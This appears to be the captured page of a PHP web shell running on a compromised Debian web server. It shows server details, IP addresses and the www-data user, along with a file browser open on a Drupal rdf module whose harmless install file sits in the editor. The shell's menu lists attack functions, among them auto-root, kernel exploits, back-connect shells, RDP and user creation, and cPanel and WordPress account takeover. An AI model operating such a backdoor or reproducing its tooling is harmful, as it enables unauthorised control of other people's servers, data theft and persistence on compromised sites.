Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.15.18.73
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
rdf /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
rdf.api.php
3.55
KB
-rw-r--r--
rdf.info
365
B
-rw-r--r--
rdf.install
1.26
KB
-rw-r--r--
rdf.module
33.54
KB
-rw-r--r--
rdf.test
34.75
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rdf.install
<?php /** * @file * Install, update and uninstall functions for the rdf module. */ /** * Implements hook_schema(). */ function rdf_schema() { $schema['rdf_mapping'] = array( 'description' => 'Stores custom RDF mappings for user defined content types or overriden module-defined mappings', 'fields' => array( 'type' => array( 'type' => 'varchar', 'length' => 128, 'not null' => TRUE, 'description' => 'The name of the entity type a mapping applies to (node, user, comment, etc.).', ), 'bundle' => array( 'type' => 'varchar', 'length' => 128, 'not null' => TRUE, 'description' => 'The name of the bundle a mapping applies to.', ), 'mapping' => array( 'description' => 'The serialized mapping of the bundle type and fields to RDF terms.', 'type' => 'blob', 'not null' => FALSE, 'size' => 'big', 'serialize' => TRUE, ), ), 'primary key' => array('type', 'bundle'), ); return $schema; } /** * Implements hook_install(). */ function rdf_install() { // Collect any RDF mappings that were declared by modules installed before // this one. $modules = module_implements('rdf_mapping'); rdf_modules_installed($modules); }
Close